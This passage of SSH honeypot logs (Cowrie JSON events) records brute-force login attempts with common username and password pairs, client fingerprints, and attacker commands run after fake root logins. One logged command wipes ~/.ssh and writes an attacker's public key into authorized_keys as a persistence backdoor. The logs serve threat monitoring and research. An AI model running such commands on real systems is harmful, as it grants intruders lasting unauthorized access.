~","sensor":"my-vps","timestamp":"2025-08-31T06:23:45.136339Z","src_ip":"212.227.235.229","session":"f75cf37a715d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:23:46.000825Z","src_ip":"212.227.235.229","session":"f75cf37a715d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:23:46.001950Z","src_ip":"212.227.235.229","session":"f75cf37a715d"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"12345678","message":"login attempt [tomcat/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T06:23:46.008163Z","src_ip":"212.227.235.229","session":"7774a0b9fe8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52644,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bdbf3b909b1","protocol":"ssh","message":"New connection: 212.227.235.229:52644 (1.2.3.4:22) [session: 8bdbf3b909b1]","sensor":"my-vps","timestamp":"2025-08-31T06:23:46.166853Z"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:23:47.693099Z","src_ip":"212.227.235.229","session":"7774a0b9fe8b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:23:47.894167Z","src_ip":"212.227.235.229","session":"8bdbf3b909b1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:23:48.060290Z","src_ip":"212.227.235.229","session":"8bdbf3b909b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51778,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c5af8b0de06","protocol":"ssh","message":"New connection: 212.227.235.229:51778 (1.2.3.4:22) [session: 8c5af8b0de06]","sensor":"my-vps","timestamp":"2025-08-31T06:23:51.880086Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:23:51.880850Z","src_ip":"212.227.235.229","session":"8c5af8b0de06"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64818,"dst_ip":"1.2.3.4","dst_port":22,"session":"b59a297ac7a7","protocol":"ssh","message":"New connection: 217.72.205.35:64818 (1.2.3.4:22) [session: b59a297ac7a7]","sensor":"my-vps","timestamp":"2025-08-31T06:23:51.959041Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:23:51.960179Z","src_ip":"217.72.205.35","session":"b59a297ac7a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:23:52.183815Z","src_ip":"212.227.235.229","session":"8c5af8b0de06"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123123123","message":"login attempt [deploy/123123123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:23:53.438260Z","src_ip":"212.227.235.229","session":"8c5af8b0de06"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:23:53.460280Z","src_ip":"212.227.235.229","session":"c0d253664cce"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:23:54.742894Z","src_ip":"212.227.235.229","session":"8c5af8b0de06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56552,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a43256691a0","protocol":"ssh","message":"New connection: 212.227.125.160:56552 (1.2.3.4:22) [session: 3a43256691a0]","sensor":"my-vps","timestamp":"2025-08-31T06:23:54.950221Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:23:57.079972Z","src_ip":"212.227.235.229","session":"8bdbf3b909b1"}
{"eventid":"cowrie.session.closed","duration":"40.7","message":"Connection lost after 40.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:23:58.245332Z","src_ip":"212.227.235.229","session":"c0d253664cce"}
{"eventid":"cowrie.session.closed","duration":"12.2","message":"Connection lost after 12.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:23:58.402611Z","src_ip":"212.227.235.229","session":"8bdbf3b909b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56523,"dst_ip":"1.2.3.4","dst_port":22,"session":"f844c38ab597","protocol":"ssh","message":"New connection: 212.227.235.229:56523 (1.2.3.4:22) [session: f844c38ab597]","sensor":"my-vps","timestamp":"2025-08-31T06:23:58.564283Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:23:58.629740Z","src_ip":"212.227.235.229","session":"f844c38ab597"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:23:58.792706Z","src_ip":"212.227.235.229","session":"f844c38ab597"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:23:59.344820Z","src_ip":"212.227.125.160","session":"3a43256691a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:23:59.385314Z","src_ip":"212.227.125.160","session":"3a43256691a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36826,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee6104d3c4d4","protocol":"ssh","message":"New connection: 212.227.125.160:36826 (1.2.3.4:22) [session: ee6104d3c4d4]","sensor":"my-vps","timestamp":"2025-08-31T06:24:00.231697Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:24:00.687755Z","src_ip":"212.227.125.160","session":"ee6104d3c4d4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:24:00.689729Z","src_ip":"212.227.125.160","session":"ee6104d3c4d4"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"12345678","message":"login attempt [tomcat/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T06:24:03.157886Z","src_ip":"212.227.125.160","session":"ee6104d3c4d4"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:24:04.770077Z","src_ip":"212.227.125.160","session":"ee6104d3c4d4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:24:06.735524Z","src_ip":"212.227.235.229","session":"f844c38ab597"}
{"eventid":"cowrie.session.closed","duration":"11.6","message":"Connection lost after 11.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:24:10.142308Z","src_ip":"212.227.235.229","session":"f844c38ab597"}
{"eventid":"cowrie.session.closed","duration":"35.0","message":"Connection lost after 35.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:24:10.143440Z","src_ip":"212.227.235.229","session":"f75cf37a715d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38364,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b68d7b633a3","protocol":"ssh","message":"New connection: 212.227.235.229:38364 (1.2.3.4:22) [session: 6b68d7b633a3]","sensor":"my-vps","timestamp":"2025-08-31T06:24:25.969335Z"}
{"eventid":"cowrie.login.success","username":"root","password":"QQ123456","message":"login attempt [root/QQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:24:27.672276Z","src_ip":"212.227.125.160","session":"3a43256691a0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:24:30.122703Z","src_ip":"212.227.235.229","session":"6b68d7b633a3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:24:30.142991Z","src_ip":"212.227.235.229","session":"6b68d7b633a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":31738,"dst_ip":"1.2.3.4","dst_port":22,"session":"460bcf5cb9b6","protocol":"ssh","message":"New connection: 212.227.235.229:31738 (1.2.3.4:22) [session: 460bcf5cb9b6]","sensor":"my-vps","timestamp":"2025-08-31T06:24:31.042962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:24:31.043786Z","src_ip":"212.227.235.229","session":"460bcf5cb9b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:24:31.259633Z","src_ip":"212.227.235.229","session":"460bcf5cb9b6"}
{"eventid":"cowrie.login.success","username":"root","password":"456123","message":"login attempt [root/456123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:24:32.162307Z","src_ip":"212.227.235.229","session":"460bcf5cb9b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:24:32.615301Z","src_ip":"212.227.235.229","session":"460bcf5cb9b6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:24:32.616138Z","src_ip":"212.227.235.229","session":"460bcf5cb9b6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:24:32.617332Z","src_ip":"212.227.235.229","session":"460bcf5cb9b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:24:32.833301Z","src_ip":"212.227.235.229","session":"460bcf5cb9b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:24:33.736052Z","src_ip":"212.227.235.229","session":"460bcf5cb9b6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:24:33.736918Z","src_ip":"212.227.235.229","session":"460bcf5cb9b6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:24:33.956142Z","src_ip":"212.227.235.229","session":"460bcf5cb9b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:24:33.957242Z","src_ip":"212.227.235.229","session":"460bcf5cb9b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63189,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ee0ab8c3df7","protocol":"ssh","message":"New connection: 212.227.235.229:63189 (1.2.3.4:22) [session: 9ee0ab8c3df7]","sensor":"my-vps","timestamp":"2025-08-31T06:24:34.169504Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:24:34.172345Z","src_ip":"212.227.235.229","session":"9ee0ab8c3df7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:24:34.385644Z","src_ip":"212.227.235.229","session":"9ee0ab8c3df7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:24:35.247392Z","src_ip":"212.227.235.229","session":"9ee0ab8c3df7"}
